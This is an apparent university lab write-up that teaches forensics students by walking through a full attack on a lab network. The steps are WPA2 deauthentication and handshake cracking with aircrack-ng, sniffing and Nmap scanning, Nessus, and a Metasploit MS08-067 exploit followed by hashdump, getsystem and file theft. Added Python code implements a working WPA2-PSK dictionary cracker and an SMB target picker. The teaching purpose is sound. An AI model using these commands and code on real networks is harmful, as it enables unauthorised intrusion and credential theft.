IST 454 Section 001
Team Alpha Video Hands-on Lab Project: Demonstrating Network Cracking and Exploitation
Brian Pinchak, Tim Nary, Garrett Miller, Chase Tralka, Jonathan Ring, Kenton Martin 4/7/2011
Page 1 of 12
Introduction
As wireless technology continues to grow and improve, the demand for computer forensic specialists who can keep up with it grows with it. As a forensic examiner you may be called to the scene of a company hit by an attack and asked to perform network forensics to help reconstruct the sequence of events and discover how the attack succeeded.
This video lab will cover common network exploitation techniques an attacker can use to break into a wireless network and steal sensitive information. We hope to illustrate to the class the dangers of poorly protected computer networks, along with the kinds of scenarios cyber forensics specialists may be called in to investigate. This project will show the importance of network forensics in the field.
For this lab you will be introduced to Jim, who works for a very successful IT firm. Jim has set up a wireless network for himself within his cubicle (against company policy) so he can move freely about the building with his laptop. Unfortunately he uses a weak WPA2 pre-shared key, and in doing so compromises the security of the entire company. The class, a team of highly trained forensic specialists, has to figure out how this attack happened.
The tools introduced in this lab will be:

Ubuntu Linux - Ubuntu is a free, light yet powerful open source operating system based on the Debian GNU/Linux distribution. The commands you will see executed in the video lab are performed on this operating system.

Aircrack-ng Suite - Aircrack-ng is a network software suite consisting of several powerful wireless sniffing, analysis, and password cracking tools geared toward popular wireless encryption schemes such as WEP and WPA/WPA2-PSK.

Wireshark - Wireshark is an open source packet analyzer. It captures packets off a wired or wireless network interface and provides tools to filter and analyze the traffic. It is a great tool for forensics; for the purposes of this lab, however, we will show how attackers can use it to their advantage as well.

Nmap - Nmap is a free, open source network mapping utility used for network exploration and security auditing. For this lab we will show the network exploration aspect.

Nessus - Nessus is a comprehensive vulnerability scanner which produces detailed reports on possible exploitable weaknesses in the systems it scans.

Metasploit - Metasploit is a free, open source penetration testing framework which comes preloaded with exploit modules for many known vulnerabilities.
Section I: Attacking a WPA2-Encrypted Network
The first phase of this video lab covers attacking a WPA2-encrypted wireless network.

1. First, boot the Ubuntu operating system, open a terminal and become the root user of the system. To do this, type the following into the terminal:

sudo su
After you enter your password your prompt should now show root.

2. After root privileges are acquired, you must determine what wireless device interfaces are attached to the system. This is important because the interface name will be needed for later commands. To check this, type the following command into your terminal:

iwconfig
You should get an output similar to the screenshot above. Look for your wireless interface, wlan0.

3. Now that we have discovered our interface it is time to place our wireless adapter into monitor mode using airmon-ng. Monitor mode lets our wireless card see all traffic/packets received from nearby wireless networks without having to associate with those networks' access points (routers). To set our card to this mode we will use airmon-ng, which is part of the Aircrack-ng suite. Type the following command into your terminal:

airmon-ng start wlan0
You should have an output similar to the one above, indicating that a monitor-mode interface has been created on top of your wireless interface; for our purposes it is named mon0.
4. Now that we have a monitor interface it is time to run airodump-ng to find potential networks in range to attack. To do this, type into the terminal:

airodump-ng mon0
airodump-ng will hop across all wireless channels, and in your terminal you will get a table of information on the networks it sees, such as the BSSID (the access point's MAC address), traffic activity, channel, encryption type, ESSID (network name), and associated stations, which are the clients currently connected to each network.
5. You, as the attacker, have identified a network of interest called "Jim's Cubicle". We can now limit our packet capture to that network's channel, and write the captured packets to disk, by typing the following into the terminal:

airodump-ng -w wpacap --channel <channel #> mon0
The -w flag sets the filename prefix for the file which will contain the captured network packets (airodump-ng appends a sequence number and extension, so the first capture file will be wpacap-01.cap). Although not used in this video, you can also narrow the capture to a single access point with --bssid <BSSID>, which is useful when the channel your target is on is shared with additional networks.
6. Now that airodump-ng is capturing packets on our chosen network, we see there is a client, Jim, currently active on his network. We must deauthenticate him and force his machine to reconnect while we are capturing the network packets. With WPA/WPA2-PSK the reconnection generates a 4-way handshake; the handshake does not contain the key itself, but it carries enough material (the two nonces and a keyed MIC) for us to test password guesses offline. To deauthenticate a client, first open a new terminal window. Now run aireplay-ng with its deauthentication attack against the wireless network, using the BSSID of the router. This allows airodump-ng to capture the handshake needed to crack the password. Type the following:

aireplay-ng -a <BSSID> --deauth 100 mon0
The -a flag names the target access point's BSSID, in this case Jim's Cubicle; with no -c <client MAC> given, aireplay-ng sends broadcast deauthentication frames that knock every client off that access point, and --deauth 100 sends 100 rounds of them. The aireplay-ng output shows whether the frames were sent, and the airodump-ng window shows "WPA handshake: <BSSID>" in its top line once a handshake has been captured.

7. Now that we have captured the WPA2 handshake, we can start the cracking process using a dictionary attack. Open a third terminal window and run aircrack-ng to find the password. Type the following command into your terminal:

aircrack-ng -a 2 -w <path of GDictLab.txt> <path of capture file>
Here -a 2 selects WPA/WPA2-PSK cracking and -w names the wordlist. aircrack-ng will take the capture file containing the handshake (wpacap-01.cap) and try every entry of our dictionary file GDictLab.txt against it. Each guess costs 4096 rounds of PBKDF2-HMAC-SHA1 to derive the candidate key before it can be checked against the handshake, so the run takes anywhere from minutes to days depending on the size of the wordlist and how deep into it the real password sits. Jim's password, however, is weak, and turns up quickly.

Once you have discovered the password it is time to access the network: stop the monitor interface (airmon-ng stop mon0) and connect wlan0 to Jim's Cubicle with the recovered key.
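What aircrack-ng is doing in step 7, as an added example that is not part of the original lab or of the Aircrack-ng project: a WPA2-PSK dictionary attack written from scratch with the Python standard library. Since no real capture is available here, the script first simulates Jim's access point and laptop (a constructed SSID, MAC addresses, nonces and passphrase, all assumptions) to produce the message-2 EAPOL frame and MIC that airodump-ng would have saved, then runs a constructed wordlist against it the way aircrack-ng does: PBKDF2 to the PMK, the 802.11i PRF to the PTK, and an HMAC-SHA1 MIC check. It shows why the 4-way handshake is needed (both MAC addresses and both nonces feed the PTK) and why each guess is slow (4096 PBKDF2 rounds).

```python
# Added example (not part of the original lab): a from-scratch WPA2-PSK
# dictionary attack against a 4-way handshake, standard library only.
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81        # byte offset of the 16-byte MIC inside an EAPOL-Key frame
PBKDF2_ROUNDS = 4096   # fixed by IEEE 802.11i for passphrase -> PMK


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the values sent in the clear during the handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame with its MIC field zeroed."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Message 2 of the 4-way handshake (client -> AP), MIC field zeroed."""
    body = (bytes([0x02])                    # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")    # key info: pairwise, MIC present, descriptor version 2
            + (0).to_bytes(2, "big")         # key length (0 in message 2)
            + (1).to_bytes(8, "big")         # replay counter
            + snonce                         # the client's nonce, sent in the clear
            + bytes(16)                      # key IV
            + bytes(8)                       # key RSC
            + bytes(8)                       # key ID (reserved)
            + bytes(16)                      # MIC placeholder
            + len(key_data).to_bytes(2, "big")
            + key_data)                      # RSN IE echoed by the client
    return bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body  # 802.1X header: v2, EAPOL-Key


def forge_handshake(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                    anonce: bytes, snonce: bytes) -> dict:
    """Simulate Jim's AP and laptop so we have a 'capture' to attack (constructed data)."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    eapol = build_eapol_msg2(snonce, rsn_ie)
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], eapol)  # KCK is the first 128 bits of the PTK
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:], "mic": mic}


def try_passphrase(candidate: str, hs: dict) -> bool:
    """One dictionary guess: PMK -> PTK -> KCK, then compare the recomputed MIC."""
    if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8-63 chars; aircrack-ng skips the rest
        return False
    ptk = derive_ptk(pmk_from_passphrase(candidate, hs["ssid"]),
                     hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"])


def crack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: the first passphrase whose MIC matches the capture, or None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if try_passphrase(candidate, hs):
            return candidate
    return None


# Constructed stand-in for wpacap-01.cap: Jim's SSID with made-up MACs, nonces and key.
HANDSHAKE = forge_handshake(
    passphrase="password123",
    ssid="Jim's Cubicle",
    ap_mac=bytes.fromhex("00112233aabb"),
    sta_mac=bytes.fromhex("00aabbccdd01"),
    anonce=hashlib.sha256(b"anonce").digest(),
    snonce=hashlib.sha256(b"snonce").digest(),
)
# Constructed stand-in for GDictLab.txt ("letmein" is too short to be a WPA passphrase).
WORDLIST = ["letmein", "qwertyuiop", "football1", "password", "password123", "cubicle2011"]

if __name__ == "__main__":
    print("KEY FOUND:", crack(HANDSHAKE, WORDLIST))
```

Run it directly and it prints the recovered key. Everything the attacker needs comes from the capture: the SSID, the two MAC addresses, the two nonces, and the message-2 frame with its MIC, which is why one complete handshake is enough. The passphrase PBKDF2 step is the same one aircrack-ng (and every WPA2-PSK cracker) pays per guess, which is the whole reason a short, common passphrase like Jim's is the weak point.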
Section II: Capturing Network Traffic and Exploration
8. Now that we have gained access to the network, we need to know what is on it and possibly capture additional information which can help our deeper infiltration of the network and the escalation of our attack. You may now close down your Aircrack-ng windows and open Wireshark. You can open the program through Ubuntu's graphical user interface or through the terminal. From the terminal type the following command:

sudo wireshark
9. Now that Wireshark is loaded it is time to start capturing packets. To start capturing, click on the interface icon at the top left of the screen.

10. This brings up a list of interfaces Wireshark can capture from; in our case we want the interface connected to Jim's network. Select wlan0 and click Start. Wireshark will now begin to capture packets, which you as the attacker can save for later analysis. These captured packets could reveal passwords or other information to help further our attack.
With Wireshark sniffing the network, we also need to scan the network to determine what kinds of machines are on it and their possible operating systems, services, and open ports, which we can use to exploit systems over the network.

11. To perform this scan you will need the network utility Nmap. You will need to scan everything on the network; to do this open a terminal and type the following command:

sudo nmap -A 192.168.56.0/24
This command scans every host in the 192.168.56.0/24 subnet and outputs information such as which computers are up, their operating systems, and the services running. The -A option turns on OS detection, service version detection, script scanning and traceroute, and OS detection is the reason the scan is run with sudo. Your scan should output something similar to the following:

You can see that there is a host up running Windows XP, along with its running services and open ports.
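An added example, not code from the original lab or from Nmap: turning the step 11 scan into a target list for the Nessus and Metasploit steps that follow. It reads Nmap's grepable output (what nmap -oG writes; rerunning the lab scan as sudo nmap -A -oG lab.gnmap 192.168.56.0/24 produces it) and keeps only hosts whose OS fingerprint says Windows and which have SMB open on 445 (or the NetBIOS session port 139), the exposure MS08-067 needs. The report text below is constructed to resemble the lab's network; the addresses, service banners and OS guesses are made up, and the field layout follows the -oG format as this author understands it.

```python
# Added example (not part of the original lab): pick SMB-exposed Windows hosts
# out of an Nmap grepable (-oG) report. SAMPLE_GNMAP is constructed data.
from typing import Dict, List

SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -A -oG lab.gnmap 192.168.56.0/24
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0)/\tOS: Linux 2.6.X
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tOS: Microsoft Windows XP SP2 or SP3
Host: 192.168.56.102 ()\tPorts: 445/filtered/tcp//microsoft-ds///\tOS: Microsoft Windows 7
# Nmap done: 256 IP addresses (3 hosts up)
"""


def parse_gnmap(text: str) -> Dict[str, dict]:
    """Map each scanned IP to its OS guess and a {port: details} table.

    -oG lines are 'Host: <ip> (<name>)' followed by tab-separated 'Field: value'
    pairs; each Ports entry is port/state/proto/owner/service/rpc/version/.
    """
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                  # comments and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        host = hosts.setdefault(ip, {"os": None, "ports": {}})
        for field in fields[1:]:
            name, _, value = field.partition(": ")
            if name == "OS":
                host["os"] = value
            elif name == "Ports":
                for entry in value.split(", "):
                    entry = entry[:-1] if entry.endswith("/") else entry   # drop one trailing slash only
                    port, state, proto, _owner, service, _rpc, version = entry.split("/", 6)
                    host["ports"][int(port)] = {"state": state, "proto": proto,
                                                "service": service, "version": version}
    return hosts


def smb_targets(hosts: Dict[str, dict]) -> List[str]:
    """IPs whose OS guess is Windows and which have 445 (or 139) actually open, not filtered."""
    by_address = sorted(hosts, key=lambda ip: tuple(int(octet) for octet in ip.split(".")))
    targets = []
    for ip in by_address:
        host = hosts[ip]
        smb_open = any(host["ports"].get(port, {}).get("state") == "open" for port in (445, 139))
        if smb_open and host["os"] and "Windows" in host["os"]:
            targets.append(ip)
    return targets


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    for ip in smb_targets(found):
        print(ip, "-", found[ip]["os"], "- open:", sorted(found[ip]["ports"]))
```

The filtered 445 on the constructed third host is deliberately excluded: a filtered port means a firewall sat between the scanner and the service, so it is not a usable MS08-067 target and would only waste a Nessus run. On a real scan, the host that survives this filter is the one whose address goes into the Nessus target field and later into set RHOST.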
We have almost collected enough information to escalate our attack. We have explored the network and analyzed the traffic and the connected hosts. It is time to scan the Windows XP machine and see if there are any unpatched vulnerabilities we can exploit.
12. To perform vulnerability scans load Nessus on Ubuntu. Once the graphical interface is open you will want to start a new scan; to do this click Add on the toolbar.

13. You will be presented with a scan menu. Populate the Name field with the IP address of your target, and use that same address as the scan target. For the policy, since you are now inside the network, choose "Internal Network Scan". When done click "Launch Scan".
14. Nessus will prepare a report which you can view in a number of formats. We will choose the HTML display: click "Browse", select your report and click "Download". In the download format drop-down select "Detailed HTML Report". Nessus will now prepare your report.

Once Nessus is done it will present a detailed report of the vulnerabilities it found on your target machine. In our case this is the machine we detected earlier with Nmap.

As you can see, the machine we detected has numerous vulnerabilities we can take advantage of in the final stage of this lab. Keep this report open and continue to the next section.
Section III: Exploitation
Up to this point you have learned how malicious users may infiltrate a network and the folly of weak passwords. You have seen how they can explore a network once they have access, and in this final section you will learn how they put all this information together and finish their attack.
15. Now that we have our Nessus report, it is time to exploit a vulnerability it discovered. We will do this with the Metasploit Framework. Open a terminal with root access (as earlier in this lab) and type in the following:

msfconsole
You should get an output similar to the following:

16. Once loaded, go back to your Nessus report and make note of the MS08-067 vulnerability it found. You will be using the matching Metasploit module.
17. Go back to your terminal window with the Metasploit Framework loaded and type in the following msfconsole command:

use exploit/windows/smb/ms08_067_netapi

This module exploits MS08-067 (CVE-2008-4250), a vulnerability in the Windows Server service, the service behind Windows file and printer sharing, which is reached over SMB. A crafted path-canonicalization request overflows a stack buffer in that service and gives the attacker code execution as SYSTEM, with no credentials required. After the command is executed you should get the following:
18. At this point we want to use the show command to see what options this exploit needs in order to succeed. Type in the following:

show options

19. You will see we need a target host (RHOST). We point Metasploit at our target by typing the following:

set rhost 192.168.56.101

followed by the command

exploit

Metasploit will launch the exploit, and you should see the following output if it succeeded:
Metasploit ran the exploit and has now opened a Meterpreter session, which gives us remote access to the targeted Windows XP machine. At this point the machine is in the hands of the attacker and there are numerous possibilities. For our lab, however, we will illustrate how an attacker can dump the password hashes off the Windows computer for possible future cracking, gain administrative access even from a limited account, and steal vital information from the company's machine.
20. First let's perform a hash dump of the passwords. In the Meterpreter terminal type in the following command:

hashdump

This dumps the LM and NTLM password hashes of every local account on the machine, which the attacker can crack offline later.
21. To escalate our privileges on the system, type in the following command:

getsystem

Because the Server service exploited by MS08-067 runs as SYSTEM, the session usually already has SYSTEM privileges (check with getuid); getsystem is the step that matters when an attacker lands in a limited user account instead.
22. At this point the attacker can begin looking around for interesting files. To explore, type the Meterpreter file-system commands

ls
cd ..

to list files and directories and to move up a directory (they are modeled on the Linux commands of the same name but operate on the victim's file system). For our lab look in the C:\ drive; there you will see a file called secret.txt.txt. To an attacker this looks promising.
23. To view the contents of this file in the Meterpreter console type the following:

cat secret.txt.txt

And you will now find what you have been searching for:
Conclusion
As you can see, Jim's rogue access point led to the compromise of his company's systems. Jim had a copy of a secret password file on his system that he thought was safe; a weak wireless passphrase and an unpatched machine let this information fall into the wrong hands, and you have now been hired to figure the situation out. We have shown you how to break into networks and computers for one reason: so that you as a forensics specialist know the kinds of tools that can be used. Passive sniffing with Wireshark generates no traffic of its own and leaves no trace in network logs, but the rest of the attack does: a burst of deauthentication frames on Jim's channel followed by a new client joining his access point, an Nmap sweep that touches every host and port from one address, a Nessus scan that is a much louder version of the same, and the MS08-067 exploit as an SMB connection to port 445 on Jim's machine followed by the Meterpreter session's traffic, all of which can be matched against the logs on Jim's computer. With this evidence you can hopefully catch us and bring us to justice, or at the very least get poor Jim fired for breaking company policy and costing the company millions.